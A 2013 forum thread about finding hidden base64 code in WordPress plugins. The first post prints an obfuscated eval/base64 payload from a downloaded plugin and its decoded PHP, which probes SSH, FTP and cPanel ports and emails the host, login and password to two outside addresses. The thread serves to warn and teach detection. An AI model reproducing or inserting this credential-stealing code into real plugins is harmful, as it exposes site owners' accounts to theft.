A Method to Check Base64 Code

***Gadzookz*** · 12-06-2013, 02:01 PM

I use this method to check base64 code found in a lot of wordpress plugins and scripts. A free plugin called plugin check will analyze your installed plugins and let you know if there's any base64 code, and the location of the code. Goto the code location in the plugins editor section of your wordpress dashboard. Copy the base64 code. Goto http://www.unphp.net/ and paste the code in the decoder. Read the result. Here's the result from a plugin I downloaded on another forum. I apologize, I don't remember the plugin, but here's what I got.The base64 code was:

eval(gzinflate(base64_decode('rVPRTtswFH2PlH/woki0Uqhw+oLomJimou5hWtSUPcBQ5TouDSS+np0I2LQP2l/ia6egofQtzYPt
43POvb2+NwziAmpWSnJO4nU+X/6YL2+OFqtVtl58z1dHt7MwiFVK7XVK/T7Ffer3J6fuZBc8c3+5
NcAfQAk56rwTVCWx0FqCW0yjE3oy7jT0kIYe1vjAvSp71a/Dr9yOPrg8x2HwJ2b0PJprDTqa/Q0D
URmxR/OWc2FMNNvyCowYeQ2y3jyo90h7PdJ+D/rOwybrXaa9LtN+F1R5H3wFYx8vCoPjoX4/ZRh8
UUyKilypgjWCfJVbIDdkKTgUgmyeyTdmHtY1uyt5yeQ1uSWoGTSBBZiGnJHuXRG5MkIjUsGdBzJm
DALKroPH/2yrrhqSgW7cn8vzhY3ljrZBELlcZW9IigjPXNFewengWf2zs0bp/+X/bcM9Ci0KfJil
bZENk0XZXA8cPMLJa8BOXfSrZbJp64nSpbS9efHMdgATDrXjaMFLhbR72MkJVxt4escw7eZe8AY5
Xcmw2ibv2s1xdoIVQhvkXGqoz0jr7j5K8WguuDr2x0lpO/MTCmyXVCObX7J3T3Awkr3P+JXi0jvI
egE=')))

here is what unphp.net decoded:

$domain = $_SERVER['HTTP_HOST'];
$p21 = 21;
$p22 = 22;
$p2082 = 2082;
$cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
$cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
$cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
if(!$cp22)
{$a1="Error";}
else
{$a1="Success";fclose($cp22);}
if(!$cp21)
{$a2="Error";}
else
{$a2="Success";fclose($cp21);}
if(!$cp2082)
{$a3="Error";}
else
{$a3="Success";fclose($cp2082);}
$psn ="
-------------------------------------------------------------------------

Cpanel Update Info [ Recode by Mask_magicianZ ]

-------------------------------------------------------------------------

Host : $domain

User : $login

Pass : $pass

-------------------------------------------------------------------------

Accept Port

SSH : Port $a1

FTP : Port $a2

cPanel : Port $a3

-------------------------------------------------------------------------

. 2011 Mask_magicianz Powered by RosebanditZ

-------------------------------------------------------------------------
";
$to = "quantum.princes@yahoo.com";
$recip = "john.cpbox@yahoo.com";
$subject = "cPanel AccesS Update";
$headers = "From: update";
mail($to,$subject,$psn,$headers);
mail($recip,$subject,$psn,$headers);

as you can see, this code was designed to take your password, user login, and your domain url, and email it to the email above. Wow. Anyway, I'm sure you seasoned vets already know about this, but us newbies can fall prey to it. Beware, Check everything.

***Liquid™*** · 12-06-2013, 02:25 PM

Seriously, you can't be butthurt by that.. C'mon, you'd also do what it takes to protect your intellectual property. Do you honestly think he'd even touch his paying customers websites?

***justanumber*** · 12-06-2013, 02:36 PM

Very interesting indeed. Use another method myself but ends up at same point.

Sure some will find this info useful. Thanks for sharing.

***Gadzookz*** · 12-06-2013, 03:25 PM

Butthurt? Nah, just sharing.

***Soul*** · 12-07-2013, 02:26 AM

Talking about this plugin?

Code:

http://wordpress.org/plugins/plugin-check/

***Gadzookz*** · 12-07-2013, 05:33 AM

(12-07-2013 02:26 AM)Soul Wrote: Talking about this plugin?

Code:

http://wordpress.org/plugins/plugin-check/

yes.

***Soul*** · (This post was last modified: 12-07-2013 09:55 PM by Soul.)

Warning message from WordPress:

Code:

This plugin hasn't been updated in over 2 years.

 It may no longer be maintained or supported and may have compatibility 

issues when used with more recent versions of WordPress.

Compatible up to: 3.3.2 version of WP

***GreenPeace*** · 12-08-2013, 04:22 AM

Thanks for sharing But Why the developer wants their customer's ID and pass without their knowledge!! Marketplace like themeforest should ban those devs.

***basuraza*** · 12-09-2013, 12:56 AM

Some other times you get fragments of code that they join all together getting the full string work as decode, just use:
TAC: http://wordpress.org/plugins/tac/
And antivirus: http://wordpress.org/plugins/antivirus/
One year old Theme Check: http://wordpress.org/plugins/theme-check/
Just check your code first before uploading to production environment.

***Gadzookz*** · (This post was last modified: 12-10-2013 06:21 PM by Gadzookz.)

(12-07-2013 09:53 PM)Soul Wrote: Warning message from WordPress:

Code:

This plugin hasn't been updated in over 2 years. It may no longer be maintained or supported and may have compatibility issues when used with more recent versions of WordPress.

Compatible up to: 3.3.2 version of WP

I noticed that too, but I find it still works.

(12-08-2013 04:22 AM)GreenPeace Wrote: Thanks for sharing But Why the developer wants their customer's ID and pass without their knowledge!! Marketplace like themeforest should ban those devs.

Exactly.